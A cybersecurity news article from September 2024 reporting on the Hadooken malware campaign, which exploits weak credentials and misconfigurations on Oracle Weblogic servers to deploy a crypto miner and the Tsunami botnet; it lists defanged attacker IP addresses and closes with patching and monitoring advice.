News New Linux Malware Campaign Targets Oracle Weblogic for Crypto Mining

New Linux Malware Campaign Targets Oracle Weblogic for Crypto Mining
September 13, 2024

Introduction​

A new malware campaign has emerged, targeting Linux environments and specifically Oracle Weblogic servers. This sophisticated attack aims to exploit vulnerabilities for cryptocurrency mining and botnet deployment, raising concerns in the cybersecurity community.
The Hadooken Malware
What is Hadooken?
Researchers at cloud security firm Aqua have identified a malware strain dubbed "Hadooken." This malicious software is at the heart of the current campaign, designed with two primary objectives:

• Deploy cryptocurrency mining software
• Deliver a Tsunami botnet malware

Attack Methodology​

The attackers employ a multi-step process to infiltrate and exploit vulnerable systems:

1. Exploit known security vulnerabilities and misconfigurations
2. Use weak credentials to gain initial access
3. Execute arbitrary code on compromised instances
4. Deploy two similar payloads (Python and shell script versions)
5. Retrieve the Hadooken malware from remote servers

"When Hadooken is executed, it drops a Tsunami malware and deploys a crypto miner," explains security researcher Assaf Moran.

Lateral Movement and Persistence​

The shell script version of the payload demonstrates advanced capabilities:

• Iterates through directories containing SSH data
• Uses gathered information to attack known servers
• Moves laterally across the organization or connected environments
• Spreads the Hadooken malware further

To ensure long-term presence on infected systems, Hadooken establishes persistence by creating cron jobs. These scheduled tasks run the cryptocurrency miner at varying frequencies, making detection and removal more challenging.

The Tsunami Botnet Connection​

Hadooken's deployment of the Tsunami (also known as Kaiten) botnet is particularly concerning. This distributed denial-of-service (DDoS) tool has a history of targeting Jenkins and Weblogic services in Kubernetes clusters, indicating a potential for widespread disruption.
Infrastructure and Possible Links
The investigation has uncovered two primary IP addresses associated with the campaign:

• 89.185.85[.]102 (registered in Germany)
• 185.174.136[.]204 (currently inactive)

Both IPs are linked to Aeza Group Ltd., a company with a presence in Moscow and Frankfurt. Cybersecurity experts have raised concerns about Aeza's rapid growth and potential connections to cybercrime.

"The modus operandi of Aeza and its fast growth can be explained by the recruitment of young developers affiliated to bulletproof hosting providers in Russia offering shelter to cybercrime," researchers noted in a recent report.

Conclusion​

The emergence of the Hadooken malware campaign highlights the evolving sophistication of cyber threats targeting Linux environments. By exploiting vulnerabilities in widely-used software like Oracle Weblogic, attackers can potentially gain access to vast computational resources for cryptocurrency mining while also building powerful botnets for future attacks.

As this campaign continues to develop, it's crucial for organizations to strengthen their security measures, particularly around server configurations and access controls. Regular patching, strong authentication practices, and robust monitoring systems are essential in mitigating the risks posed by such advanced and persistent threats.

The involvement of bulletproof hosting providers adds another layer of complexity to the fight against cybercrime, emphasizing the need for international cooperation in addressing these global security challenges.